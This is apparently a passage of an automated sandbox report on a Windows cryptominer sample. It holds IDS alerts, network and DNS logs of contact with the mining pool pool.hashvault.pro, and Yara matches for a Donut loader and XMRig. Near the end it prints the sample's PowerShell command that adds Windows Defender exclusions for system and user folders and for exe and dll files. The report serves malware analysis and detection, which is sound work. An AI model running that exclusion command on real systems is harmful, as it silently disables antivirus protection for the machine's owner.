                                                   .rsrc | 0x1dbb000 | 0x1f0 | 0x200 | 042f8dc0c5470b0dce68fda4d1872eb1 | False | 0.53125 | data | 4.831618991015907 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                   RT_MANIFEST | 0x1dbb058 | 0x198 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | English | United States | 0.553921568627451
                                                   DLL | Import
                                                   msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                   kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter
                                                   Language of compilation system | Country where language is spoken
                                                   English | United States


                                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                   2025-01-12T14:19:06.623850+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP
                                                   2025-01-12T14:19:08.414148+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP
                                                   2025-01-12T14:20:10.875041+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP
                                                  • Total Packets: 32
                                                  • 443 (HTTPS)
                                                  • 53 (DNS)
                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                   Jan 12, 2025 14:19:08.425515890 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:08.425563097 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:08.425632000 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:08.425708055 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:08.425715923 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:08.426218033 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:14.421180964 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:14.421278000 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:14.421372890 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:14.421504021 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:14.421535015 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:14.421670914 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:19.452370882 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:19.452404976 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:19.452486992 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:19.452625990 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:19.452634096 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:19.452780962 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:24.483525038 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:24.483618021 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:24.483721972 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:24.497188091 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:24.497225046 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:24.497502089 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:29.530535936 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:29.530587912 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:29.530689001 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:29.530853987 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:29.530868053 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:29.531131983 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:34.608056068 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:34.608150959 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:34.608226061 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:34.608597994 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:34.608624935 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:34.608745098 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:39.649596930 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:39.649688005 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:39.649766922 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:39.649863005 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:39.649880886 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:39.650091887 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:44.686709881 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:44.686795950 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:44.686907053 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:44.687077045 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:44.687117100 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:44.687258959 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:49.733779907 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:49.733875990 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:49.734076977 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:49.734226942 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:19:49.734251976 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:49.734417915 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:19:54.776551962 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:54.776587009 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:54.776658058 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:54.789866924 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:19:54.789881945 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:19:54.790009022 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:00.796072960 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:00.796161890 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:00.796621084 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:00.805141926 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:00.805181980 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:00.805242062 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:05.842875957 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:20:05.842959881 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:20:05.843055010 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:20:05.843153000 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67
                                                   Jan 12, 2025 14:20:05.843173981 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:20:05.843357086 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4
                                                   Jan 12, 2025 14:20:10.883552074 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:10.883565903 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:10.883616924 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:10.883702993 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:10.883708954 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:10.883858919 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:15.905391932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:15.905452967 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:15.905528069 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:15.914099932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:15.914133072 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:15.914235115 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4
                                                   Jan 12, 2025 14:20:20.921058893 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11
                                                   Jan 12, 2025 14:20:20.921148062 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4
                                                  Jan 12, 2025 14:20:20.921235085 CET49885443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:20.921322107 CET49885443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:20.921344042 CET44349885192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:20.921503067 CET44349885192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.969124079 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.969217062 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.969294071 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.972429991 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.972466946 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.972748995 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:30.999187946 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:30.999248981 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:30.999350071 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:31.009056091 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:31.009074926 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:31.009161949 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061723948 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061747074 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061810017 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061894894 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061903000 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061999083 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094238997 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094253063 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094316006 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094440937 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094449997 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094543934 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.155685902 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.155786037 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.155878067 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.164726019 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.164767981 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.164819956 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.186750889 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186805010 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.186876059 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186965942 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186976910 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.187099934 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:56.218153954 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218225002 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:56.218312979 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218415976 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218434095 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:56.218573093 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.264909983 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.264995098 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.265084982 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.273346901 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.273377895 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.273428917 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:06.312091112 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312122107 CET44350027192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:21:06.312194109 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312285900 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312292099 CET44350027192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:21:06.312411070 CET44350027192.248.189.11192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 14:19:08.414148092 CET | 57699 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2025 14:19:08.421493053 CET | 53 | 57699 | 1.1.1.1 | 192.168.2.4
Jan 12, 2025 14:20:10.875041008 CET | 51665 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2025 14:20:10.882807016 CET | 53 | 51665 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 14:19:08.414148092 CET | 192.168.2.4 | 1.1.1.1 | 0x48b9 | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
Jan 12, 2025 14:20:10.875041008 CET | 192.168.2.4 | 1.1.1.1 | 0x10c1 | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | pool.hashvault.pro | - | 192.248.189.11 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | pool.hashvault.pro | - | 80.240.16.67 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | pool.hashvault.pro | - | 80.240.16.67 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | pool.hashvault.pro | - | 192.248.189.11 | A (IP address) | IN (0x0001) | false


                                                  Target ID:0
                                                  Start time:08:19:02
                                                  Start date:12/01/2025
                                                  Path:C:\Users\user\Desktop\9d2h99wrj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\9d2h99wrj.exe"
                                                  Imagebase:0x400000
                                                  File size:31'161'344 bytes
                                                  MD5 hash:88848246CE109235A762FCD193210CAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:08:19:02
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                  Imagebase:0x7ff6fc9a0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
